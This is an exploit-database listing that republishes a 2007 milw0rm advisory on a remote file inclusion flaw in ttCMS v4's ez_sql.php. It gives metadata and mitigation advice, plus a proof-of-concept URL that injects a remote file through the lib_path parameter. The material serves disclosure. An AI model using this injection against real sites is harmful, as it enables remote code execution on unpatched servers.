header-logo
Suggest Exploit
vendor:
ttCMS
by:
Kacper (a.k.a Rahim)
7.5
CVSS
HIGH
RFI (Remote File Inclusion)
CWE
Product Name: ttCMS
Affected Version From: ttCMS v4 and earlier
Affected Version To: ttCMS v4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ttCMS <= v4 (ez_sql.php lib_path) RFI Vulnerability

This exploit allows an attacker to include remote files by manipulating the 'lib_path' parameter in the ez_sql.php file of ttCMS version 4 or earlier.

Mitigation:

Upgrade to a newer version of ttCMS that has fixed this vulnerability or implement proper input validation and sanitization.
Source

Exploit-DB raw data:

DEVIL TEAM - HACKING POLISH TEAM

Author: Kacper (a.k.a Rahim)
Contact: kacper1964@yahoo.pl
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam 
--------------------------------------------
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.



ttCMS <= v4 (ez_sql.php lib_path) RFI Vulnerability
script download/homepage: http://www.ttcms.com/v4/


--------------------------------------------
Vulnerabilities:

http://site.com/ttCMS_path/lib/db/ez_sql.php?lib_path=[evil_code]

# milw0rm.com [2007-03-24]

Navigation

Suggest Exploit

Services By CQR